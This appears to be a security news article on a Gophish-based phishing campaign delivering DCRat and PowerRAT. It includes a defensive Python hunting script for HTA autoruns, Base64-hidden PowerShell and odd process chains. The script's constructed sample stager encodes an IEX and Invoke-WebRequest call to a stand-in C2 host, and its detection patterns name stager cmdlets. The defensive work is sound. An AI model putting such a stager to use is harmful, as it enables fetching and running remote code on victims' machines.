Russian-speaking users are the target of a phishing campaign that abuses Gophish, an open-source phishing framework, to deliver two remote access trojans: DarkCrystal RAT (DCRat) and a newly identified PowerRAT. The campaign uses modular infection chains that start from either a malicious document (maldoc) or an HTML file, and each chain needs the victim to act (enable macros or click a link) before the infection proceeds, according to a report by Cisco Talos researcher Chetan Raghuprasad.
Phishing Campaign Details
The campaign is tailored for Russian-speaking users, inferred from the language in the phishing emails, the content of malicious documents, and links disguised as legitimate Russian services like Yandex Disk and VK.
Gophish is normally used by organizations to run simulated phishing exercises against their own staff; here a threat actor has repurposed it as a delivery platform, distributing either DCRat or PowerRAT depending on which lure the target receives. The phishing emails carry either a malicious Microsoft Word document or an HTML file with embedded JavaScript.
Once the victim opens the maldoc and enables macros, a Visual Basic for Applications (VBA) macro extracts an HTML Application (HTA) file and a PowerShell loader, then writes a Windows Registry autostart value so that the HTA is launched every time the user logs in.
PowerRAT and DCRat Deployment
The HTA drops a JavaScript file that is run with cscript.exe, the legitimate Windows Script Host console binary, and that script launches the PowerShell loader. The loader is disguised as an INI file and carries Base64-encoded data; decoding it yields PowerRAT, which is executed directly in memory rather than written to disk as an executable.
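The chain above leaves three artefacts a defender can hunt for: an autostart value that points at an HTA, an INI-looking file whose content is really a long Base64 run that decodes to PowerShell, and a process lineage in which Word spawns mshta.exe and cscript.exe spawns powershell.exe. The following Python is an added example, not code or tooling from the Talos report, and it contains no indicators from the report: the registry values, process-creation events, file paths and stager text are all constructed for illustration.

```python
"""Hunting helpers for the maldoc chain: macro -> HTA autorun -> JScript run by
cscript.exe -> INI-disguised PowerShell loader -> in-memory payload.

All sample data below is constructed for illustration; none of it is an IOC.
"""
import base64
import re

# Process names involved in the hand-offs the chain relies on.
SCRIPT_HOSTS = {"mshta.exe", "cscript.exe", "wscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}

# Cmdlets and helpers that almost always show up in PowerShell stagers.
PS_MARKERS = re.compile(
    r"(?i)\b(IEX|Invoke-Expression|FromBase64String|Invoke-WebRequest|"
    r"DownloadString)\b"
)
# A long unbroken Base64 run has no business in a genuine INI file.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def suspicious_autorun(value_data: str) -> bool:
    """Flag an autostart value that launches an HTA, as the macro's persistence does."""
    data = value_data.lower()
    return ".hta" in data or "mshta" in data


def hidden_powershell(ini_text: str) -> list[str]:
    """Decode long Base64 runs in INI-looking text and return PowerShell markers found.

    UTF-16LE (what -EncodedCommand expects) is tried first, then UTF-8.
    """
    hits = set()
    for run in B64_RUN.findall(ini_text):
        try:
            raw = base64.b64decode(run, validate=True)
        except ValueError:  # not valid Base64 after all
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            hits.update(m.group(1) for m in PS_MARKERS.finditer(decoded))
    return sorted(hits)


def suspicious_lineage(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (parent, child, child cmdline) for Office -> script host and
    script host -> script host / interpreter hand-offs in process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        p, c = parent["image"].lower(), e["image"].lower()
        if (p in OFFICE_APPS and c in SCRIPT_HOSTS) or (
            p in SCRIPT_HOSTS and c in SCRIPT_HOSTS | INTERPRETERS
        ):
            findings.append((parent["image"], e["image"], e["cmdline"]))
    return findings


# --- Constructed samples (hypothetical paths, hosts and values) ------------

# What an encoded stager looks like: UTF-16LE PowerShell wrapped in Base64.
_STAGER = (
    "$d=[Convert]::FromBase64String($p);"
    "$s=[Text.Encoding]::Unicode.GetString($d);IEX $s;"
    "Invoke-WebRequest -Uri 'http://c2.invalid/a'"
)
SAMPLE_INI = "[Update]\nVersion=2\nPayload=" + base64.b64encode(
    _STAGER.encode("utf-16-le")
).decode() + "\n"

SAMPLE_AUTORUNS = {
    "OneDrive": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Update": r"C:\Users\u\AppData\Roaming\update.hta",
}

SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": "WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.docm"},
    {"pid": 2100, "ppid": 2000, "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Roaming\update.hta"},
    {"pid": 2200, "ppid": 2100, "image": "cscript.exe",
     "cmdline": r"cscript.exe //E:JScript C:\Users\u\AppData\Roaming\run.js"},
    {"pid": 2300, "ppid": 2200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c <decoded loader>"},
    {"pid": 3000, "ppid": 1000, "image": "chrome.exe", "cmdline": "chrome.exe"},
]


def run_hunt() -> dict:
    """Apply all three checks to the constructed samples."""
    return {
        "autoruns": [n for n, v in SAMPLE_AUTORUNS.items() if suspicious_autorun(v)],
        "loader_markers": hidden_powershell(SAMPLE_INI),
        "lineage": suspicious_lineage(SAMPLE_EVENTS),
    }


if __name__ == "__main__":
    for name, result in run_hunt().items():
        print(name, result)
```

On real data the same three functions would be fed Run/RunOnce values exported from HKCU and HKLM, the contents of recently written .ini files under the user profile, and Sysmon event ID 1 (or EDR process-creation) records; the lineage check deliberately flags script-host-to-script-host hops as well as the final hop into PowerShell, because mshta.exe launching cscript.exe is itself unusual in a normal user session.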
PowerRAT performs system reconnaissance, collects drive serial numbers, and contacts remote servers in Russia for further instructions. If the command-and-control (C2) server is unreachable, it falls back to running an embedded PowerShell script; Talos reads this fallback behaviour as a sign that the malware is still under development.
The alternate infection chain uses HTML files with embedded malicious JavaScript to deliver DCRat. When the victim clicks the link in the email, a remotely hosted HTML file opens and its JavaScript triggers the download of a 7-Zip archive; inside is a password-protected self-extracting (SFX) RAR archive, which in turn drops the RAT.
RAT Capabilities and Threat Evolution
DCRat is a modular RAT that can steal sensitive data, capture screenshots and keystrokes, and give the operator remote access to the infected system. It can also download and execute additional files, and it establishes persistence through Windows scheduled tasks.
Cisco Talos also noted that the nested self-extracting archives used in this campaign have been seen before in attacks distributing SparkRAT. Those attacks likewise relied on GitHub repositories to host and retrieve malware components, a tactic that complicates detection and response because the downloads blend in with legitimate developer traffic to GitHub.
Protecting Against These Threats
Users are urged to:
- Avoid enabling macros in unsolicited Word documents.
- Verify the authenticity of email links before clicking.
- Use strong email filtering solutions to block phishing attempts.
- Monitor network traffic for unusual connections to suspicious domains or IP addresses.
This campaign, along with warnings from Cofense about virtual hard disk (VHD) files used to distribute other malware such as Remcos RAT and XWorm, underscores the growing complexity of phishing attacks and the need for robust email security practices.